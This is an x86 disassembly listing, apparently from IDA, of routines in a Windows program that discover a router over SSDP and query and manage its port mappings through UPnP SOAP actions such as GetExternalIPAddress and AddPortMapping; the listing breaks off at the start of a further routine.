loc_9B2637: ; CODE XREF: sub_9B25D9+55�j
push 10h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_30], edi
call sub_9B3240 ; memset
add esp, 0Ch
push ebx
mov [ebp+var_44], 2
call esi ; dword_9A1294
mov esi, dword_9A12B0
push offset a239_255_255_25 ; "239.255.255.250"
mov [ebp+var_42], ax
call esi ; dword_9A12B0
mov ebx, dword_9A125C
push 4
mov [ebp+var_40], eax
lea eax, [ebp+var_24]
push eax
push 4
push 0FFFFh
push [ebp+var_8]
call ebx ; dword_9A125C
test eax, eax
jge short loc_9B2689
xor eax, eax
jmp loc_9B274D
; ---------------------------------------------------------------------------
loc_9B2689: ; CODE XREF: sub_9B25D9+A7�j
cmp [ebp+arg_4], edi
jz short loc_9B26A7
push [ebp+arg_4]
call esi ; dword_9A12B0
push 4
mov [ebp+var_10], eax
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
push 9
push edi
push [ebp+var_8]
call ebx ; dword_9A125C
loc_9B26A7: ; CODE XREF: sub_9B25D9+B3�j
push 10h
lea eax, [ebp+var_34]
push eax
push [ebp+var_8]
call dword_9A126C ; bind
test eax, eax
jnz loc_9B2742
mov [ebp+var_1C], edi
mov [ebp+var_C], offset off_9A6404
jmp short loc_9B26CC
; ---------------------------------------------------------------------------
loc_9B26CA: ; CODE XREF: sub_9B25D9+1A8�j
; sub_9B25D9+1B2�j ...
xor edi, edi
loc_9B26CC: ; CODE XREF: sub_9B25D9+EF�j
; sub_9B25D9+164�j
cmp [ebp+var_1C], edi
jnz short loc_9B2710
mov eax, [ebp+var_C]
push dword ptr [eax]
lea eax, [ebp+var_644]
push offset aMSearchHttp1_1 ; "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255."...
push 600h
push eax
call dword_9A11D4 ; _snprintf
add [ebp+var_C], 4
add esp, 10h
push 10h
lea ecx, [ebp+var_44]
push ecx
push edi
push eax
lea eax, [ebp+var_644]
push eax
push [ebp+var_8]
call dword_9A1260 ; sendto
test eax, eax
jl short loc_9B273F
loc_9B2710: ; CODE XREF: sub_9B25D9+F6�j
push [ebp+arg_0]
lea eax, [ebp+var_644]
push 600h
push eax
push [ebp+var_8]
call sub_9B21B5
add esp, 10h
cmp eax, edi
mov [ebp+var_1C], eax
jl short loc_9B273F
jnz short loc_9B2752
cmp [ebp+var_4], edi
jnz short loc_9B273F
mov eax, [ebp+var_C]
cmp [eax], edi
jnz short loc_9B26CC
loc_9B273F: ; CODE XREF: sub_9B25D9+135�j
; sub_9B25D9+156�j ...
mov edi, [ebp+var_4]
loc_9B2742: ; CODE XREF: sub_9B25D9+DF�j
push [ebp+var_8]
call dword_9A1284 ; closesocket
mov eax, edi
loc_9B274D: ; CODE XREF: sub_9B25D9+AB�j
pop esi
pop ebx
loc_9B274F: ; CODE XREF: sub_9B25D9+2B�j
pop edi
leave
retn
; ---------------------------------------------------------------------------
loc_9B2752: ; CODE XREF: sub_9B25D9+158�j
lea ecx, [ebp+var_20]
push ecx
lea ecx, [ebp+var_14]
push ecx
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
push ecx
push eax
lea ebx, [ebp+var_644]
mov [ebp+var_18], edi
mov [ebp+var_10], edi
mov [ebp+var_14], edi
mov [ebp+var_20], edi
call sub_9B1F83
add esp, 14h
cmp [ebp+var_14], 0
jz loc_9B26CA
cmp [ebp+var_18], 0
jz loc_9B26CA
mov edi, [ebp+var_20]
mov ebx, [ebp+var_10]
lea eax, [edi+ebx+10h]
push eax
call dword_9A11BC ; malloc
mov esi, eax
mov eax, [ebp+var_4]
push ebx
push [ebp+var_18]
lea ecx, [esi+0Ch]
mov [esi], eax
lea eax, [esi+ebx+0Dh]
push ecx
mov [esi+4], ecx
mov [esi+8], eax
call sub_9B323A ; memcpy
push edi
push [ebp+var_14]
lea eax, [esi+ebx+0Dh]
push eax
mov byte ptr [esi+ebx+0Ch], 0
call sub_9B323A ; memcpy
lea eax, [esi+edi]
add esp, 1Ch
mov byte ptr [eax+ebx+0Dh], 0
mov [ebp+var_4], esi
jmp loc_9B26CA
sub_9B25D9 endp
; =============== S U B R O U T I N E =======================================
sub_9B27E6 proc near ; DATA XREF: sub_9B2872+20�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
cmp edi, 3Fh
jle short loc_9B27F4
push 3Fh
pop edi
loc_9B27F4: ; CODE XREF: sub_9B27E6+9�j
mov esi, [esp+8+arg_0]
push edi
push [esp+0Ch+arg_4]
lea eax, [esi+4]
push eax
call sub_9B323A ; memcpy
add esp, 0Ch
mov byte ptr [esi+edi+4], 0
pop edi
pop esi
retn
sub_9B27E6 endp
; =============== S U B R O U T I N E =======================================
sub_9B2811 proc near ; DATA XREF: sub_9B2872+2A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push 88h
call dword_9A11BC ; malloc
mov ebx, [esp+10h+arg_8]
cmp ebx, 3Fh
pop ecx
mov esi, eax
jle short loc_9B282E
push 3Fh
pop ebx
loc_9B282E: ; CODE XREF: sub_9B2811+18�j
mov edi, [esp+0Ch+arg_0]
push 40h
lea eax, [edi+4]
push eax
lea eax, [esi+8]
push eax
call dword_9A11E0 ; strncpy
push ebx
push [esp+1Ch+arg_4]
lea eax, [esi+48h]
push eax
mov byte ptr [esi+47h], 0
call sub_9B323A ; memcpy
mov byte ptr [esi+ebx+48h], 0
mov eax, [edi]
add esp, 18h
test eax, eax
mov [esi], eax
jz short loc_9B2869
mov eax, [edi]
mov [eax+4], esi
loc_9B2869: ; CODE XREF: sub_9B2811+51�j
mov [edi], esi
mov [esi+4], edi
pop edi
pop esi
pop ebx
retn
sub_9B2811 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2872 proc near ; CODE XREF: sub_9B2909+5C�p
; sub_9B2A48+65�p ...
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_0]
xor ecx, ecx
mov [eax], ecx
mov [ebp+var_14], eax
mov [ebp+var_24], edx
mov edx, [ebp+arg_4]
lea eax, [ebp+var_24]
push eax
mov [ebp+var_18], edx
mov [ebp+var_10], offset sub_9B27E6
mov [ebp+var_C], ecx
mov [ebp+var_8], offset sub_9B2811
mov [ebp+var_4], ecx
call sub_9B1C02
pop ecx
leave
retn
sub_9B2872 endp
; =============== S U B R O U T I N E =======================================
sub_9B28AE proc near ; CODE XREF: sub_9B2909+132�p
; sub_9B2A48+C5�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_9B28D0
; ---------------------------------------------------------------------------
loc_9B28B5: ; CODE XREF: sub_9B28AE+26�j
mov ecx, [eax]
test ecx, ecx
jz short loc_9B28C1
mov edx, [eax+4]
mov [ecx+4], edx
loc_9B28C1: ; CODE XREF: sub_9B28AE+B�j
mov ecx, [eax+4]
mov edx, [eax]
push eax
mov [ecx], edx
call dword_9A11D0 ; free
pop ecx
loc_9B28D0: ; CODE XREF: sub_9B28AE+5�j
mov eax, [esi]
test eax, eax
jnz short loc_9B28B5
pop esi
retn
sub_9B28AE endp
; =============== S U B R O U T I N E =======================================
sub_9B28D8 proc near ; CODE XREF: sub_9B2909+6A�p
; sub_9B2909+7B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
push edi
xor edi, edi
jmp short loc_9B2900
; ---------------------------------------------------------------------------
loc_9B28E4: ; CODE XREF: sub_9B28D8+2A�j
test edi, edi
jnz short loc_9B2904
push [esp+8+arg_4]
lea eax, [esi+8]
push eax
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B28FE
lea edi, [esi+48h]
loc_9B28FE: ; CODE XREF: sub_9B28D8+21�j
mov esi, [esi]
loc_9B2900: ; CODE XREF: sub_9B28D8+A�j
test esi, esi
jnz short loc_9B28E4
loc_9B2904: ; CODE XREF: sub_9B28D8+E�j
mov eax, edi
pop edi
pop esi
retn
sub_9B28D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2909 proc near ; CODE XREF: sub_9B2221+22�p
var_1054 = byte ptr -1054h
var_54 = byte ptr -54h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1054h
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+arg_8]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_C], 1000h
jnz short loc_9B2939
cmp [ebp+arg_C], ebx
jnz short loc_9B2939
push 0FFFFFFFEh
pop eax
jmp loc_9B2A44
; ---------------------------------------------------------------------------
loc_9B2939: ; CODE XREF: sub_9B2909+21�j
; sub_9B2909+26�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1054]
push eax
push ebx
push offset aGetstatusinfo ; "GetStatusInfo"
push [ebp+arg_4]
push [ebp+arg_0]
push 0FFFFFFFFh
call sub_9B234F
lea eax, [ebp+var_54]
push eax
push [ebp+var_C]
lea eax, [ebp+var_1054]
push eax
call sub_9B2872
lea eax, [ebp+var_54]
push offset aNewuptime ; "NewUptime"
push eax
call sub_9B28D8
mov [ebp+var_8], eax
lea eax, [ebp+var_54]
push offset aNewconnections ; "NewConnectionStatus"
push eax
call sub_9B28D8
mov [ebp+arg_8], eax
lea eax, [ebp+var_54]
push offset aNewlastconnect ; "NewLastConnectionError"
push eax
call sub_9B28D8
add esp, 40h
cmp [ebp+arg_8], ebx
mov [ebp+var_10], eax
jz short loc_9B29AD
cmp [ebp+var_8], ebx
jz short loc_9B29AD
mov [ebp+var_4], ebx
loc_9B29AD: ; CODE XREF: sub_9B2909+9A�j
; sub_9B2909+9F�j
cmp esi, ebx
push edi
mov edi, dword_9A11E0
jz short loc_9B29CF
cmp [ebp+arg_8], ebx
jz short loc_9B29CD
push 40h
push [ebp+arg_8]
push esi
call edi ; dword_9A11E0
add esp, 0Ch
mov [esi+3Fh], bl
jmp short loc_9B29CF
; ---------------------------------------------------------------------------
loc_9B29CD: ; CODE XREF: sub_9B2909+B2�j
mov [esi], bl
loc_9B29CF: ; CODE XREF: sub_9B2909+AD�j
; sub_9B2909+C2�j
cmp [ebp+arg_C], ebx
jz short loc_9B29ED
cmp [ebp+var_8], ebx
jz short loc_9B29ED
push [ebp+arg_C]
push offset dword_9A137C
push [ebp+var_8]
call dword_9A1140 ; sscanf
add esp, 0Ch
loc_9B29ED: ; CODE XREF: sub_9B2909+C9�j
; sub_9B2909+CE�j
mov esi, [ebp+arg_10]
cmp esi, ebx
jz short loc_9B2A0B
cmp [ebp+var_10], ebx
jz short loc_9B2A09
push 40h
push [ebp+var_10]
push esi
call edi ; dword_9A11E0
add esp, 0Ch
mov [esi+3Fh], bl
jmp short loc_9B2A0B
; ---------------------------------------------------------------------------
loc_9B2A09: ; CODE XREF: sub_9B2909+EE�j
mov [esi], bl
loc_9B2A0B: ; CODE XREF: sub_9B2909+E9�j
; sub_9B2909+FE�j
lea eax, [ebp+var_54]
push offset aErrorcode ; "errorCode"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
pop edi
jz short loc_9B2A37
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset dword_9A1358
push eax
call dword_9A1140 ; sscanf
add esp, 0Ch
loc_9B2A37: ; CODE XREF: sub_9B2909+115�j
lea eax, [ebp+var_54]
push eax
call sub_9B28AE
mov eax, [ebp+var_4]
pop ecx
loc_9B2A44: ; CODE XREF: sub_9B2909+2B�j
pop esi
pop ebx
leave
retn
sub_9B2909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2A48 proc near ; CODE XREF: sub_9A6FD2+5F�p
var_104C = byte ptr -104Ch
var_4C = byte ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+arg_8]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_8], 1000h
jz loc_9B2B18
cmp [ebp+arg_0], ebx
jz loc_9B2B18
cmp [ebp+arg_4], ebx
jz loc_9B2B18
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_104C]
push eax
push ebx
push offset aGetexternalipa ; "GetExternalIPAddress"
push [ebp+arg_4]
push [ebp+arg_0]
push 0FFFFFFFFh
call sub_9B234F
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B2872
lea eax, [ebp+var_4C]
push offset aNewexternalipa ; "NewExternalIPAddress"
push eax
call sub_9B28D8
add esp, 30h
cmp eax, ebx
jz short loc_9B2ADC
push 10h
push eax
push esi
call dword_9A11E0 ; strncpy
add esp, 0Ch
mov [esi+0Fh], bl
mov [ebp+var_4], ebx
jmp short loc_9B2ADE
; ---------------------------------------------------------------------------
loc_9B2ADC: ; CODE XREF: sub_9B2A48+7D�j
mov [esi], bl
loc_9B2ADE: ; CODE XREF: sub_9B2A48+92�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2B09
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset dword_9A1358
push eax
call dword_9A1140 ; sscanf
add esp, 0Ch
loc_9B2B09: ; CODE XREF: sub_9B2A48+A8�j
lea eax, [ebp+var_4C]
push eax
call sub_9B28AE
mov eax, [ebp+var_4]
pop ecx
jmp short loc_9B2B1B
; ---------------------------------------------------------------------------
loc_9B2B18: ; CODE XREF: sub_9B2A48+21�j
; sub_9B2A48+2A�j ...
push 0FFFFFFFEh
pop eax
loc_9B2B1B: ; CODE XREF: sub_9B2A48+CE�j
pop esi
pop ebx
leave
retn
sub_9B2A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2B1F proc near ; CODE XREF: sub_9A7077+CF�p
var_104C = byte ptr -104Ch
var_4C = byte ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
cmp [ebp+arg_C], 0
push ebx
push edi
mov [ebp+var_8], 1000h
jz loc_9B2C4F
cmp [ebp+arg_10], 0
jz loc_9B2C4F
mov ebx, [ebp+arg_18]
test ebx, ebx
jz loc_9B2C4F
mov edi, [ebp+arg_8]
test edi, edi
jz loc_9B2C4F
push esi
push 8
push 9
call dword_9A113C ; calloc
mov esi, eax
mov eax, [ebp+arg_C]
mov [esi+1Ch], eax
mov eax, [ebp+arg_10]
mov [esi+24h], eax
mov eax, [ebp+arg_14]
test eax, eax
pop ecx
pop ecx
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
mov [esi+0Ch], edi
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], ebx
mov dword ptr [esi+18h], offset aNewinternalpor ; "NewInternalPort"
mov dword ptr [esi+20h], offset aNewinternalcli ; "NewInternalClient"
mov dword ptr [esi+28h], offset aNewenabled ; "NewEnabled"
mov dword ptr [esi+2Ch], offset a1 ; "1"
mov dword ptr [esi+30h], offset aNewportmapping ; "NewPortMappingDescription"
jnz short loc_9B2BC3
mov eax, offset byte_9A14D5
loc_9B2BC3: ; CODE XREF: sub_9B2B1F+9D�j
mov [esi+34h], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_104C]
push eax
push esi
push offset aAddportmapping ; "AddPortMapping"
push [ebp+arg_4]
mov dword ptr [esi+38h], offset aNewleasedurati ; "NewLeaseDuration"
push [ebp+arg_0]
mov dword ptr [esi+3Ch], offset a0 ; "0"
push 0FFFFFFFFh
call sub_9B234F
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B2872
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax
call sub_9B28D8
add esp, 30h
test eax, eax
jz short loc_9B2C33
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset dword_9A1358
push eax
call dword_9A1140 ; sscanf
add esp, 0Ch
jmp short loc_9B2C37
; ---------------------------------------------------------------------------
loc_9B2C33: ; CODE XREF: sub_9B2B1F+F9�j
and [ebp+var_4], 0
loc_9B2C37: ; CODE XREF: sub_9B2B1F+112�j
lea eax, [ebp+var_4C]
push eax
call sub_9B28AE
push esi
call dword_9A11D0 ; free
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop esi
jmp short loc_9B2C52
; ---------------------------------------------------------------------------
loc_9B2C4F: ; CODE XREF: sub_9B2B1F+1A�j
; sub_9B2B1F+24�j ...
push 0FFFFFFFEh
pop eax
loc_9B2C52: ; CODE XREF: sub_9B2B1F+12E�j
pop edi
pop ebx
leave
retn
sub_9B2B1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2C56 proc near ; CODE XREF: sub_9A6EE2+C6�p
var_1048 = byte ptr -1048h
var_48 = byte ptr -48h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 1048h
call __alloca_probe
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
push edi
mov [ebp+var_4], 1000h
jz loc_9B2D24
mov edi, [ebp+arg_C]
test edi, edi
jz loc_9B2D24
push esi
push 8
push 4
call dword_9A113C ; calloc
mov esi, eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1048]
push eax
push esi
push offset aDeleteportmapp ; "DeletePortMapping"
push [ebp+arg_4]
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
push [ebp+arg_0]
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
push 0FFFFFFFFh
mov [esi+0Ch], ebx
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], edi
call sub_9B234F
lea eax, [ebp+var_48]
push eax
push [ebp+var_4]
lea eax, [ebp+var_1048]
push eax
call sub_9B2872
lea eax, [ebp+var_48]
push offset aErrorcode ; "errorCode"
push eax
call sub_9B28D8
add esp, 38h
test eax, eax
jz short loc_9B2D08
or [ebp+arg_8], 0FFFFFFFFh
lea ecx, [ebp+arg_8]
push ecx
push offset dword_9A1358
push eax
call dword_9A1140 ; sscanf
add esp, 0Ch
jmp short loc_9B2D0C
; ---------------------------------------------------------------------------
loc_9B2D08: ; CODE XREF: sub_9B2C56+97�j
and [ebp+arg_8], 0
loc_9B2D0C: ; CODE XREF: sub_9B2C56+B0�j
lea eax, [ebp+var_48]
push eax
call sub_9B28AE
push esi
call dword_9A11D0 ; free
mov eax, [ebp+arg_8]
pop ecx
pop ecx
pop esi
jmp short loc_9B2D27
; ---------------------------------------------------------------------------
loc_9B2D24: ; CODE XREF: sub_9B2C56+1B�j
; sub_9B2C56+26�j
push 0FFFFFFFEh
pop eax
loc_9B2D27: ; CODE XREF: sub_9B2C56+CC�j
pop edi
pop ebx
leave
retn
sub_9B2C56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2D2B proc near ; CODE XREF: sub_9A6EE2+81�p
var_104C = byte ptr -104Ch
var_4C = byte ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+arg_8]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_8], 1000h
jnz short loc_9B2D56
push 0FFFFFFFEh
pop eax
jmp loc_9B2F28
; ---------------------------------------------------------------------------
loc_9B2D56: ; CODE XREF: sub_9B2D2B+21�j
mov eax, [ebp+arg_10]
push edi
mov [eax], bl
mov eax, [ebp+arg_14]
push 8
push 2
mov [eax], bl
call dword_9A113C ; calloc
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_104C]
push ecx
push eax
push offset aGetgenericport ; "GetGenericPortMappingEntry"
push [ebp+arg_4]
mov [ebp+arg_8], eax
push [ebp+arg_0]
mov dword ptr [eax], offset aNewportmappi_0 ; "NewPortMappingIndex"
push 0FFFFFFFFh
mov [eax+4], esi
call sub_9B234F
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B2872
lea eax, [ebp+var_4C]
push offset aNewremotehost ; "NewRemoteHost"
push eax
call sub_9B28D8
mov esi, dword_9A11E0
add esp, 38h
cmp eax, ebx
jz short loc_9B2DD6
mov edi, [ebp+arg_24]
cmp edi, ebx
jz short loc_9B2DD6
push 40h
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+3Fh], bl
loc_9B2DD6: ; CODE XREF: sub_9B2D2B+96�j
; sub_9B2D2B+9D�j
lea eax, [ebp+var_4C]
push offset aNewexternalpor ; "NewExternalPort"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2E00
mov edi, [ebp+arg_C]
cmp edi, ebx
jz short loc_9B2E00
push 6
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+5], bl
mov [ebp+var_4], ebx
loc_9B2E00: ; CODE XREF: sub_9B2D2B+BD�j
; sub_9B2D2B+C4�j
lea eax, [ebp+var_4C]
push offset aNewprotocol ; "NewProtocol"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2E27
mov edi, [ebp+arg_18]
cmp edi, ebx
jz short loc_9B2E27
push 4
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+3], bl
loc_9B2E27: ; CODE XREF: sub_9B2D2B+E7�j
; sub_9B2D2B+EE�j
lea eax, [ebp+var_4C]
push offset aNewinternalcli ; "NewInternalClient"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2E4D
mov edi, [ebp+arg_10]
push 10h
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+0Fh], bl
mov [ebp+var_4], ebx
loc_9B2E4D: ; CODE XREF: sub_9B2D2B+10E�j
lea eax, [ebp+var_4C]
push offset aNewinternalpor ; "NewInternalPort"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2E70
mov edi, [ebp+arg_14]
push 6
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+5], bl
loc_9B2E70: ; CODE XREF: sub_9B2D2B+134�j
lea eax, [ebp+var_4C]
push offset aNewenabled ; "NewEnabled"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2E97
mov edi, [ebp+arg_20]
cmp edi, ebx
jz short loc_9B2E97
push 4
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+3], bl
loc_9B2E97: ; CODE XREF: sub_9B2D2B+157�j
; sub_9B2D2B+15E�j
lea eax, [ebp+var_4C]
push offset aNewportmapping ; "NewPortMappingDescription"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2EBE
mov edi, [ebp+arg_1C]
cmp edi, ebx
jz short loc_9B2EBE
push 50h
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+4Fh], bl
loc_9B2EBE: ; CODE XREF: sub_9B2D2B+17E�j
; sub_9B2D2B+185�j
lea eax, [ebp+var_4C]
push offset aNewleasedurati ; "NewLeaseDuration"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9B2EE5
mov edi, [ebp+arg_28]
cmp edi, ebx
jz short loc_9B2EE5
push 10h
push eax
push edi
call esi ; dword_9A11E0
add esp, 0Ch
mov [edi+0Fh], bl
loc_9B2EE5: ; CODE XREF: sub_9B2D2B+1A5�j
; sub_9B2D2B+1AC�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax
call sub_9B28D8
cmp eax, ebx
pop ecx
pop ecx
pop edi
jz short loc_9B2F11
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset dword_9A1358
push eax
call dword_9A1140 ; sscanf
add esp, 0Ch
loc_9B2F11: ; CODE XREF: sub_9B2D2B+1CD�j
lea eax, [ebp+var_4C]
push eax
call sub_9B28AE
push [ebp+arg_8]
call dword_9A11D0 ; free
mov eax, [ebp+var_4]
pop ecx
pop ecx
loc_9B2F28: ; CODE XREF: sub_9B2D2B+26�j
pop esi
pop ebx
leave
retn
sub_9B2D2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2F2C proc near ; CODE XREF: sub_9A7077+F8�p
var_104C = byte ptr -104Ch
var_4C = byte ptr -4Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 104Ch
call __alloca_probe
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+arg_14], 0
push ebx
push edi
mov [ebp+var_8], 1000h
jz loc_9B306E
cmp [ebp+arg_10], 0
jz loc_9B306E
mov ebx, [ebp+arg_8]
test ebx, ebx
jz loc_9B306E
mov edi, [ebp+arg_C]
test edi, edi
jz loc_9B306E
push esi
push 8
push 4
call dword_9A113C ; calloc
mov esi, eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_104C]
push eax
push esi
push offset aGetspecificpor ; "GetSpecificPortMappingEntry"
push [ebp+arg_4]
mov dword ptr [esi], offset aNewremotehost ; "NewRemoteHost"
push [ebp+arg_0]
mov dword ptr [esi+8], offset aNewexternalpor ; "NewExternalPort"
push 0FFFFFFFFh
mov [esi+0Ch], ebx
mov dword ptr [esi+10h], offset aNewprotocol ; "NewProtocol"
mov [esi+14h], edi
call sub_9B234F
lea eax, [ebp+var_4C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_104C]
push eax
call sub_9B2872
lea eax, [ebp+var_4C]
push offset aNewinternalcli ; "NewInternalClient"
push eax
call sub_9B28D8
mov edi, dword_9A11E0
add esp, 38h
test eax, eax
jz short loc_9B2FF9
mov ebx, [ebp+arg_10]
push 10h
push eax
push ebx
call edi ; dword_9A11E0
add esp, 0Ch
and [ebp+var_4], 0
mov byte ptr [ebx+0Fh], 0
jmp short loc_9B2FFF
; ---------------------------------------------------------------------------
loc_9B2FF9: ; CODE XREF: sub_9B2F2C+B5�j
mov eax, [ebp+arg_10]
mov byte ptr [eax], 0
loc_9B2FFF: ; CODE XREF: sub_9B2F2C+CB�j
lea eax, [ebp+var_4C]
push offset aNewinternalpor ; "NewInternalPort"
push eax
call sub_9B28D8
test eax, eax
pop ecx
pop ecx
jz short loc_9B3025
mov ebx, [ebp+arg_14]
push 6
push eax
push ebx
call edi ; dword_9A11E0
add esp, 0Ch
mov byte ptr [ebx+5], 0
jmp short loc_9B302B
; ---------------------------------------------------------------------------
loc_9B3025: ; CODE XREF: sub_9B2F2C+E5�j
mov eax, [ebp+arg_14]
mov byte ptr [eax], 0
loc_9B302B: ; CODE XREF: sub_9B2F2C+F7�j
lea eax, [ebp+var_4C]
push offset aErrorcode ; "errorCode"
push eax
call sub_9B28D8
test eax, eax
pop ecx
pop ecx
jz short loc_9B3056
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4]
push ecx
push offset dword_9A1358
push eax
call dword_9A1140 ; sscanf
add esp, 0Ch
loc_9B3056: ; CODE XREF: sub_9B2F2C+111�j
lea eax, [ebp+var_4C]
push eax
call sub_9B28AE
push esi
call dword_9A11D0 ; free
mov eax, [ebp+var_4]
pop ecx
pop ecx
pop esi
jmp short loc_9B3071
; ---------------------------------------------------------------------------
loc_9B306E: ; CODE XREF: sub_9B2F2C+1E�j
; sub_9B2F2C+28�j ...
push 0FFFFFFFEh
pop eax
loc_9B3071: ; CODE XREF: sub_9B2F2C+140�j
pop edi
pop ebx
leave
retn
sub_9B2F2C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B3080 proc near ; CODE XREF: sub_9A799A+45�p
var_90 = dword ptr -90h
arg_0 = dword ptr 4
pusha
cld
